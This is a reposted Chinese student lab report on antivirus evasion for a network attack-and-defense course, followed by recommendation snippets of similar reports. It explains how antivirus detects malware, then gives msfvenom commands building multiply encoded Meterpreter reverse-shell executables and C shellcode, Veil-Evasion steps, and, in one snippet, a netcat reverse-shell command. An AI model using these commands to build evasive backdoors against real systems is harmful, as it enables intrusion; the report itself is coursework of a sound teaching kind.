2017-2018-2 『网络对抗技术』Exp3:免杀原理与实践

最新推荐文章于 2024-09-25 17:53:40 发布
最新推荐文章于 2024-09-25 17:53:40 发布
阅读量154 收藏
点赞数
文章标签: 运维 操作系统
原文链接:http://www.cnblogs.com/nxy970408/p/8786484.html
版权

1. 免杀原理与实践说明

一、实验说明

  • 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)

  • 任务二:通过组合应用各种技术实现恶意代码免杀(1分)

  • 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分)

二、基础问题回答

  • 问:杀软是如何检测出恶意代码的?

    • 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。
    • 基于行为来检测:通过对恶意代码的观察、研究,有一些行为是恶意代码的共同行为,而且比较特殊。所以当一个程序在运行时,杀毒软件会监视其行为,如果发现了这种特殊的行为,则会把它当成恶意软件。

  • 问:免杀是做什么?

    • 通过使用一些技术手段,让杀毒软件无法识别并分析主机中的恶意代码。

  • 问:免杀的基本方法有哪些?

    1. 改变特征码:
      • 只有exe——加壳
      • 有shellcode——利用shellcode生成可执行文件
      • 有源代码——用其他语言重写再编译
    2. 改变行为:
      • 通讯方式:尽量使用反弹式连接、使用隧道技术、加密通讯数据等。
      • 操作模式:基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码等。

使用msf编码器生成后门程序及检测

1. 将实验二中生成的后门文件放在virscan.org网站中扫描,结果如下:

1072288-20180411005411257-929444473.png

2. 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=xxx LPORT=xxx -f exe > met-encoded10.exe指令多次编码,生成的文件扫描结果如下:

1072288-20180411005427428-1428099328.png

使用veil-evasion生成后门程序及检测

1.参考以下两个网站进行Veil-evasion的安装

http://www.freebuf.com/sectool/89024.html

http://www.mamicode.com/info-detail-1766789.html

2.进入veil主界面

1072288-20180411005631947-1427974862.png

3.选择payload

  • 首先选择use 4,输入文件名的时候报错了。

1072288-20180411005718454-1167576165.png

1072288-20180411005748938-137243806.png

不知道为什么……可能安装的时候有问题吧。百度了一些解决方法也没用。

  • 尝试老师码云中的例子,选择use 23,成功

1072288-20180411141951786-753650709.png

1072288-20180411142023051-1171943510.png

  • 还进行了一些其他尝试,如:use 40,也成功了

1072288-20180411005831689-1583413250.png

1072288-20180411005843795-1341991032.png

  • 生成文件所在文件夹

1072288-20180411142140806-1775557675.png

1072288-20180411142151358-1537855135.png

4. 扫描

基本被检测几率较小

1072288-20180411005852940-1434294768.png

1072288-20180411143001854-2011749924.png

注入Shellcode并执行

1. 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=443 -f c生成数组

1072288-20180411005921047-1631120876.png

1072288-20180411144837614-488236187.png

2. linux平台交叉编译windows应用

  • 发生错误:未找到命令

1072288-20180411144850807-744264193.png

  • 解决方法:重装mingw-w64

参考网址:

http://www.jb51.net/os/other/545317.html

到这里,安装到一半整个虚拟机都崩了,重启后卡死在登陆界面
新的kali还在持续设置中……

五百年了,虚拟机终于又安好了,可以做实验了

转载于:https://www.cnblogs.com/nxy970408/p/8786484.html

weixin_34380948
关注
2017-2018-2 20155314《网络对抗技术Exp3 免杀原理实践
axhc_chentao1981的博客
04-11 568
2017-2018-2 20155314《网络对抗技术Exp3 免杀原理实践 目录 实验要求 实验环境 预备知识 实验步骤 1 免杀效果实测 1.1 恶意代码生成工具 1.2 免杀效果的评价 1.2.1 VirusTotal、Virscan 1.2.2 免杀效果参考基准 1.3 Msfvenom 1.4 Veil-Evasion 1.5 C语言调用Shellcode,Li...
2017-2018-2 20155303 『网络对抗技术Exp3免杀原理实践
weixin_34126557的博客
04-10 166
2017-2018-2 20155303 『网络对抗技术Exp3免杀原理实践 ————————CONTENTS———————— 1. 免杀原理实践说明 实验说明 基础问题回答 2. 使用msf编码器生成后门程序及检测 3. 使用veil-evasion生成后门程序及检测 4. 使用shellcode生成后门程序并检测 5. 实验中遇到的问题及思考 尝试点其他有趣的?——自解压捆绑...
2017-2018-2 20155315《网络对抗技术Exp3免杀原理实践
weixin_30763455的博客
04-09 138
实验目的 通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力。 教程 实验内容 使用msf编码器,msfvenom,veil-evasion,shellcode编程等免杀工具。 通过组合应用各种技术实现恶意代码免杀。 用另一电脑实测,在杀软开启的情况下,可运行并回连成功。 实验步骤 (一)正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-ev...
2018-2019-2 网络对抗技术 20165324 Exp3免杀原理实践
weixin_34218579的博客
03-29 143
2018-2019-2 网络对抗技术 20165324 Exp3免杀原理实践 免杀原理及基础问题回答 免杀 1. 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 2. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 3. 反过来也一样,了解了免杀的工具和技术...
2018-2019-2 20165316 『网络对抗技术Exp3免杀原理实践
aide0383的博客
03-31 264
2018-2019-2 20165316 『网络对抗技术Exp3免杀原理实践免杀原理实践说明 (一)、实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分) 任务二:通过组合应用各种技术实现恶意代码免杀(1分) 任务三:用另一电脑实测,在杀软开启的情况下,可...
2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理实践
weixin_30731287的博客
04-06 176
#2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理实践 [-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-正确使用msf编码器 2.2-veil-evasion 2.3-组合应用技术实现免杀 2.4-靶机实测 2.5-基础问题回答 3-资料 1-实践目标 1.1-实践介绍:免杀 一般是...
2018-2019-2 20165209 《网络对抗技术Exp3免杀原理实践
weixin_30276935的博客
03-31 117
2018-2019-2 20165209 《网络对抗技术Exp3免杀原理实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 1.2 实验内容 任务一:正确使用msf编码器...
2017-2018-2 『网络对抗技术』Exp2:后门原理实践
weixin_33873846的博客
04-03 135
1. 后门原理实践实验说明及预备知识 一、实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其...
2018-2019-2 网络对抗技术 20165239Exp3 免杀原理实践
weixin_34049032的博客
03-31 202
2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何检测出恶意代码的? •根据计算机病毒课程知道了每个病毒都有其对应的特征码,杀软是根据这些特征码来判定他是不是病毒。 •根据该软件的行为进行检测如有异常行为,会被判定为风险文件或病毒。 •基于行为的恶意...
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 419
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
20204323太晓梅 网络对抗技术 exp3 免杀原理实践
m0_57567318的博客
03-30 247
但是黑客实现免杀的手段和技术还是不断进步的,我们还需要提高自己的安全意识,及时更新自己的杀毒防护软件,才能有效应对被免杀手段保护到的恶意程序。同时,由于免杀技术的存在,我们也应该认识到杀毒软件并不能保障100%的安全,因此我们平时也要提高安全意识,不随便下载和点击来历不明的文件,谨防恶意代码的攻击。查看错误提示显示是文件未找到,初步推测应该是执行加密加壳的程序所在的文件夹无法找到作为模板去加壳的文件,于是把文件复制到hyperion所在的目录下,但是仍然显示找不到文件。此时就能成功进行操作了。
多模态大模型:技术原理与实战 全球多模态大模型介绍
AI天才研究院
06-11 697
关键词:多模态大模型、深度学习、计算机视觉、自然语言处理、跨模态学习、迁移学习、人工智能随着人工智能技术的飞速发展,多模态大模型已经成为了当前AI领域最热门的研究方向之一。多模态大模型能够同时处理和理解多种类型的数据,如文本、图像、音频和视频等,这为AI系统在复杂场景下的应用提供了更加强大和灵活的能力。本文将深入探讨多模态大模型的技术原理,介绍其实战应用,并对全球主要的多模态大模型进行全面的介绍和比较。
AI:184-神经网络应用与实战案例详解(AIGC技术方向)
一键难忘的博客
06-06 2032
AIGC(人工智能生成内容)依托于先进的神经网络技术,展现了极大的潜力和应用价值。本文介绍了AIGC的几种核心底层技术,包括循环神经网络(RNN)、长短期记忆网络(LSTM)、生成对抗网络(GAN)、变分自动编码器(VAE)和Transformer架构,并提供了相应的代码示例。循环神经网络(RNN)和长短期记忆网络(LSTM):RNN和LSTM擅长处理序列数据,广泛应用于文本生成和序列预测任务。LSTM通过其独特的记忆单元有效地解决了长序列依赖问题。生成对抗网络(GAN)
多模态大模型:技术原理与实战 多模态大模型的核心技术
AI天才研究院
05-25 403
多模态大模型:技术原理与实战 多模态大模型的核心技术 作者:禅与计算机程序设计艺术 1. 背景介绍 1.1 引言 近年来,随着深度学习的快速发展,人工智能领域取得了突破性进展,尤其是在计算机视觉、自然语言处理等单模态
GPU服务器本地搭建Dify+xinference实现大模型应用
最新发布
qq_43548590的博客
09-25 702
GPU服务器本地搭建Dify+xinference实现大模型应用
828华为云征文 | 华为云 X 实例服务器存储性能测试与优化策略
cooldream2009的博客
09-25 1535
在当今数字化时代,服务器的存储性能对于企业和个人用户来说至关重要。华为云作为全球领先的云服务提供商,其 X 实例服务器以强大的性能和可靠性备受关注。本文将详细介绍对华为云 X 实例服务器存储性能的测试过程,并探讨相应的优化策略,帮助读者更好地了解和利用这一强大的云服务资源。
Nexus学习
howwickhappy的博客
09-24 982
Nexus 是一个开源的仓库管理器,用于管理和分发软件构建的组件。
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 999
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
MSP-EXP430G2开发板:入门指南与功能解析
本文将对MSP-EXP430G2开发板进行详细介绍,该开发板是德州仪器(Texas Instruments, TI)推出的低成本实验平台,主要用于MSP430G2xx系列微控制器的开发、学习和评估。MSP430G2系列是一款超低功耗的16位微处理器,广泛...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值